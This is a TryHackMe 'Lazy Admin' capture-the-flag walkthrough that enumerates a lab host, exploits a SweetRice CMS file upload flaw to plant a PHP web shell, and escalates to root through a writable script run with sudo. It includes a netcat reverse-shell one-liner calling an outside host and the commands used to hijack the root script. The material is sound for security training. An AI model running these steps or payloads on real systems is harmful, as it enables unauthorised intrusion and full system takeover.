Home front-page port 80-shoopyu Lazy Admin | Tryhackme | Easy
Post
Cancel

front-page port 80-shoopyu Lazy Admin | Tryhackme | Easy

Posted Jan 5, 2023 Updated May 17, 2023
By Cotes Chung
5 min read

ย 

simple-ctf-logo

Enumeration

1
2
3
4
5
6
7
8
9
10
11
12
13

                                                                                                                    
โ”Œโ”€โ”€(rootใ‰ฟkali)-[/home/local_host/Desktop/THM]
โ””โ”€# nmap -sV 10.10.39.105
Starting Nmap 7.92 ( https://nmap.org ) at 2021-09-12 11:35 IST
Nmap scan report for 10.10.39.105
Host is up (0.15s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap done: 1 IP address (1 host up) scanned in 20.10 seconds

Letโ€™s check out port number 80

apache

We can see that itโ€™s a apache2 Ubuntu Default page letโ€™s discover the directories by gobuster

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

โ”Œโ”€โ”€(rootใ‰ฟkali)-[/home/local_host/Desktop/THM]
โ””โ”€# gobuster dir -u 10.10.39.105 -w /usr/share/wordlists/dirb/common.txt -x php,txt,html -q
/.hta                 (Status: 403) [Size: 277]
/.hta.php             (Status: 403) [Size: 277]
/.hta.txt             (Status: 403) [Size: 277]
/.hta.html            (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/.htaccess            (Status: 403) [Size: 277]
/.htpasswd.php        (Status: 403) [Size: 277]
/.htaccess.php        (Status: 403) [Size: 277]
/.htpasswd.txt        (Status: 403) [Size: 277]
/.htaccess.txt        (Status: 403) [Size: 277]
/.htpasswd.html       (Status: 403) [Size: 277]
/.htaccess.html       (Status: 403) [Size: 277]
/content              (Status: 301) [Size: 314] [--> http://10.10.39.105/content/]
/index.html           (Status: 200) [Size: 11321]
/index.html           (Status: 200) [Size: 11321]
/server-status        (Status: 403) [Size: 277]

๐Ÿค”๐Ÿค” /content

Thereโ€™s a Sweet Rice notice

line-63-sweetrice

Letโ€™s Check the sub directories of /content aswell!!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

โ”Œโ”€โ”€(rootใ‰ฟkali)-[/home/local_host/Desktop/THM]
โ””โ”€# gobuster dir -u 10.10.39.105/content -w /usr/share/wordlists/dirb/common.txt -x php,txt,html -q
/.hta                 (Status: 403) [Size: 277]
/.hta.php             (Status: 403) [Size: 277]
/.hta.txt             (Status: 403) [Size: 277]
/.hta.html            (Status: 403) [Size: 277]
/.htaccess            (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/.htaccess.txt        (Status: 403) [Size: 277]
/.htpasswd.php        (Status: 403) [Size: 277]
/.htaccess.html       (Status: 403) [Size: 277]
/.htpasswd.txt        (Status: 403) [Size: 277]
/.htaccess.php        (Status: 403) [Size: 277]
/.htpasswd.html       (Status: 403) [Size: 277]
/_themes              (Status: 301) [Size: 322] [--> http://10.10.39.105/content/_themes/]
/as                   (Status: 301) [Size: 317] [--> http://10.10.39.105/content/as/]
/attachment           (Status: 301) [Size: 325] [--> http://10.10.39.105/content/attachment/]
/changelog.txt        (Status: 200) [Size: 18013]
/images               (Status: 301) [Size: 321] [--> http://10.10.39.105/content/images/]
/inc                  (Status: 301) [Size: 318] [--> http://10.10.39.105/content/inc/]
/index.php            (Status: 200) [Size: 2198]
/index.php            (Status: 200) [Size: 2198]
/js                   (Status: 301) [Size: 317] [--> http://10.10.39.105/content/js/]
/license.txt          (Status: 200) [Size: 15410]

changelog.txt๐Ÿ”

1
2
3
4
5
6
7
8
9

#############################################
SweetRice - Simple Website Management System
Version 1.5.0
Author:Hiler Liu steelcal@gmail.com
Home page:http://www.basic-cms.org/
#############################################
New web - new SweetRice for both PC & mobile website creator,easy way to follow the new web world.

========================================

We can now conclude that the target machine is using SweetRice CMS V1.5.0. Letโ€™s search Exploit-DB

line112

ย  download and open the mysql_bakup_20191129023059-1.5.1.sql file

We now have a username and a password hash. Letโ€™s crack the hash using hashcat.

crackstation

line-120

We can now login to admin panel as we have both the username and password line-123

We have found that thereโ€™s Arbitrary File Upload vulnurablity. We can exploit it to upload a reverse shell script and gain access to the target machine.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
|  _________                      __ __________.__                  |
| /   _____/_  _  __ ____   _____/  |\______   \__| ____  ____      |
| \_____  \ \/ \/ // __ \_/ __ \   __\       _/  |/ ___\/ __ \     |
| /        \     /\  ___/\  ___/|  | |    |   \  \  \__\  ___/     |
|/_______  / \/\_/  \___  >\___  >__| |____|_  /__|\___  >___  >    |
|        \/             \/     \/            \/        \/    \/     |
|    > SweetRice 1.5.1 Unrestricted File Upload                     |
|    > Script Cod3r : Ehsan Hosseini                                |
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+

[+] Sending User&Pass...
[+] Login Succssfully...
[+] File Uploaded...
[+] URL : http://10.10.39.105/content/attachment/shell.php5

127

1
2
3
4
5
6
7
8
9

โฏ nc -nlvp 1234
Connection from 10.10.39.105:44046
Linux THM-Chal 4.15.0-70-generic #79~16.04.1-Ubuntu SMP Tue Nov 12 11:54:29 UTC 2019 i686 i686 i686 GNU/Linux
 09:34:23 up 33 min,  0 users,  load average: 0.00, 0.01, 0.24
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data

Letโ€™s navigate the file system to find the user.txt.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

$ cd /home
$ ls
itguy
$ cd itguy
$ ls
Desktop
Documents
Downloads
Music
Pictures
Public
Templates
Videos
backup.pl
examples.desktop
mysql_login.txt
user.txt
$ cat user.txt
THM{63e5bce927******************}

Privilege Escalation

1
2
3
4
5
6
7
8
9
10

$ sudo -l
Matching Defaults entries for www-data on THM-Chal:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on THM-Chal:
    (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl
$ cat backup.pl
#!/usr/bin/perl

system("sh", "/etc/copy.sh");

The backup.pl script executes /etc/copy.sh. !!!!!!

1
2

$ cat /etc/copy.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/f

We can run this file as root, so if we create a reverse shell using this file, we can get root access to the target machine from our host macine

1

$ echo 'php /var/www/html/content/attachment/shell.php5' > /etc/copy.sh

Now we have to run backup.pl as root.

1
2

$ sudo /usr/bin/perl /home/itguy/backup.pl
$ Successfully opened reverse shell to 10.17.15.106:1234

1
2
3
4
5
6
7
8
9
10
11
12
13
14

$ nc -nlvp 1234
Connection from 10.10.39.105:44052
Linux THM-Chal 4.15.0-70-generic #79~16.04.1-Ubuntu SMP Tue Nov 12 11:54:29 UTC 2019 i686 i686 i686 GNU/Linux
 09:46:00 up 44 min,  0 users,  load average: 0,00, 0,00, 0,09
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=0(root) gid=0(root) groups=0(root)
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
# cd /root
# ls
root.txt
# cat root.txt
THM{6637f41d01***************}

CONGRAGULATIONS !๐Ÿ’ซ

Write Up, TryHackMe
walkthrough lazy admin fileupload arbitrary file upload basic cms sweetrice apache2 ssh
This post is licensed under CC BY 4.0 by the author.
Recently Updated
Contents

front-page port 80-shoopyu Regular Expressions| Tryhackme |

front-page port 80-shoopyu Burpsuite Learning Resources ๐Ÿง ๐Ÿ’ป